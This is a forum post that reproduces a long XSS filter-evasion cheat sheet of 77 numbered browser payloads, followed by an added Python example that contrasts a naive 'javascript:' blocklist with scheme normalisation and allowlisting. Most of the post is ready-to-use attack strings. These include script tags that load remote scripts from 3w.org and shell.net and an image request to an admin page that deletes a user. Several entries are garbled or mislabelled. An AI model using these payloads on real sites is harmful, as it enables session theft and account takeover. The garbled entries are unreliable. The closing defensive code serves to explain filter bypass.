It seems t00ls has relatively little material on XSS. I saw some good stuff and copied it over, in case anyone wants to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, since there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript with escape filtering
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
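As an added illustration (not part of the original post or the cheat sheet it reproduces), here is a Python check showing why a literal substring filter for javascript: is slipped past by vectors 3 to 19, and what holds up instead: normalise the attribute value the way a lenient browser would, then allowlist the scheme. The function names, the scheme list and the sample values are my own assumptions.

```python
import html
import re

# Characters that lenient HTML/URL parsers (notably older IE) ignore inside a
# scheme: C0 controls incl. tab/LF/CR (vectors 11-14), space (19), NUL (17).
# Stripping all of them is deliberately conservative: the check errs toward
# rejecting a URL rather than accepting a disguised one.
_IGNORED = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"[a-z][a-z0-9+.-]*")
SAFE_SCHEMES = {"http", "https", "mailto"}  # allowlist, never a denylist

def normalize_url(value: str) -> str:
    """Reduce an attribute value to the form a browser would act on.

    Decodes HTML character references with or without the trailing ';'
    (vectors 5, 8-10), drops ignored characters from the scheme and
    lowercases it (vector 4), so 'jav<TAB>ascript:', 'JaVaScRiPt:',
    '&#106;avascript:' and 'java<NUL>script:' all become 'javascript:'.
    """
    decoded = html.unescape(value)  # handles &#106; &#x6A; and bare &#106
    scheme, sep, rest = decoded.partition(":")
    scheme = _IGNORED.sub("", scheme).lower()
    return scheme + sep + rest

def naive_blocklist(value: str) -> bool:
    """The literal-substring check the vectors above are built to slip past."""
    return "javascript:" not in value and "vbscript:" not in value

def is_safe_url(value: str) -> bool:
    """Allowlist check: accept relative URLs and a few known schemes only."""
    scheme, sep, _ = normalize_url(value).partition(":")
    # No ':' at all, or a prefix that is not a valid scheme token (e.g.
    # '/search?q=a:b' or '//host/path'), means a relative URL; it resolves
    # against the page origin and cannot carry a javascript: scheme.
    if not sep or not _SCHEME.fullmatch(scheme):
        return True
    return scheme in SAFE_SCHEMES

if __name__ == "__main__":
    # Constructed samples modelled on the vectors in the post.
    for v in ["JaVaScRiPt:alert('XSS')", "jav\tascript:alert('XSS');",
              " javascript:alert('XSS');", "&#106;avascript:alert('XSS')",
              "java\x00script:alert('XSS')", "http://3w.org/XSS/xss.js"]:
        print(f"{v!r:36} blocklist={naive_blocklist(v)!s:5} allowlist={is_safe_url(v)}")
```

The blocklist column reports True (passed) for every disguised form while the allowlist rejects all of them and still accepts ordinary http and relative links.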